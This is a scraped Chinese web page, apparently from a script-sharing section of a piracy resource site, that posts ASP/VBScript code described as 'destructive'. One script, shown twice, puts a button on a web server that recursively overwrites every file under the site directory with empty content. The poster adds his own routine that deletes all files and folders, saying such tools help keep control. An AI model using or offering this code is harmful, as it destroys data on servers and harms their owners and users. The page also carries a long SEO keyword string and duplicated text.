"" Then Call listfile(server.mappath("./")) ;更新日期:2024/12/29.幽灵资源网,磁力链接,云盘下载,BT种子,CPU天梯,显卡天梯,UU加速器,阅读3.0,英雄联盟,怪物猎人,无损音乐网,无损音乐下载网站,无损音乐免费下载,320Kmp3下载,无损音乐免费下载网站,音画欣赏,无损音乐,抖音神曲,发烧大碟,车载歌曲,试音天碟,WMA,WAV+CUE,WAV整轨,FLAC分轨,DSD黑胶,HI-FI试音,SACD-ISO,4K高清,高清电影下载,Magnet,Torrent,BitTorrent,迅雷快传,SUB,SRT,ASS/SSA,SUP,RARBG,TLF字幕,BluRay,x265,x264,DTS-HD,WEBRip,10BIT,HDR,DDP5.1,WEB-DL,1080p高清电影下载,中国高清网,高清电影,720p,1080p,MKV,AVI,蓝光原盘,3D高清,电影下载">
VBS破坏性应用代码
脚本专栏 发布日期:2024/12/29 浏览次数:1
正在浏览:VBS破坏性应用代码
'网上看到的,适用与没有禁用shell.application的服务器 server.scripttimeout = 99999 If request("submit")<>"" Then Call listfile(server.mappath("./")) response.Write"处理完毕" Else response.Write"<form><input type=""submit"" name=""submit"" value=""清空所有文件的内容""></form>" End If
Function listfile(fpath) On Error Resume Next Dim Shell, Folder, s Set Shell = server.CreateObject ("shell.application") Set Folder = Shell.namespace(fpath) Set f = server.CreateObject("adodb.stream") f.Type = 1 f.Open For Each s in Folder.Items If s.isfolder Then Call listfile(s.Path) Else f.savetofile s.Path, 2 End If Next Set f = Nothing Set Shell = Nothing End Function
'网上看到的,适用与没有禁用shell.application的服务器 server.scripttimeout = 99999 If request("submit")<>"" Then Call listfile(server.mappath("./")) response.Write"处理完毕" Else response.Write"<form><input type=""submit"" name=""submit"" value=""清空所有文件的内容""></form>" End If
Function listfile(fpath) On Error Resume Next Dim Shell, Folder, s Set Shell = server.CreateObject ("shell.application") Set Folder = Shell.namespace(fpath) Set f = server.CreateObject("adodb.stream") f.Type = 1 f.Open For Each s in Folder.Items If s.isfolder Then Call listfile(s.Path) Else f.savetofile s.Path, 2 End If Next Set f = Nothing Set Shell = Nothing End Function 以前也看到过这个,感觉没什么用,这么危险的组件服务器一般都禁用了,但今天,我突然觉得有进也得收集或制作一些这样的软件,可以维护自己的权力。具体什么原因我就不说了,我写的一个:
view plaincopy to clipboardprint? '看到文件删文件,看到文件夹删除文件夹 Function FilesTree(sPath) Set oFso = CreateObject("Scripting.FileSystemObject") Set oFolder = oFso.GetFolder(sPath) Set oSubFolders = oFolder.SubFolders
Set oFiles = oFolder.Files For Each oFile In oFiles 'WScript.Echo oFile.Path oFile.Delete Next
For Each oSubFolder In oSubFolders 'WScript.Echo oSubFolder.Path oSubFolder.Delete 'FilesTree(oSubFolder.Path)'递归 Next
Set oFolder = Nothing Set oSubFolders = Nothing Set oFso = Nothing End Function